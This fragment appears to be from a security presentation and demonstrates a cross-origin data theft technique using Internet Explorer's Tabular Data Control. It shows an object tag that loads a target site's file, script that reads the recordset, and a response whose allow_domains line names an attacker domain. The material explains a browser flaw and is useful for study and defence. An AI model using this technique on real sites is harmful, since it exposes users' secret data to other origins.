var s = document.getElementById("tdc") .recordset.getString(); alert( s ); } ... <meta http-‐equiv="x-‐ua-‐compatible" content="IE=10" > <object id="tdc" ondatasetcomplete="show()" classid="clsid:333C7BC4-‐460F-‐11D0-‐BC04-‐0080C7055A83"> <param name="DataURL" value="http://example.jp/target.txt"> </object> //target page included secret data on example.jp/target.txt Content-‐Type: application/octet-‐stream Content-‐Disposition: attachment; filename=bindata X-‐Content-‐Type-‐Options: nosniff @!allow_domains=attacker.utf-‐8.jp secret,data,is,here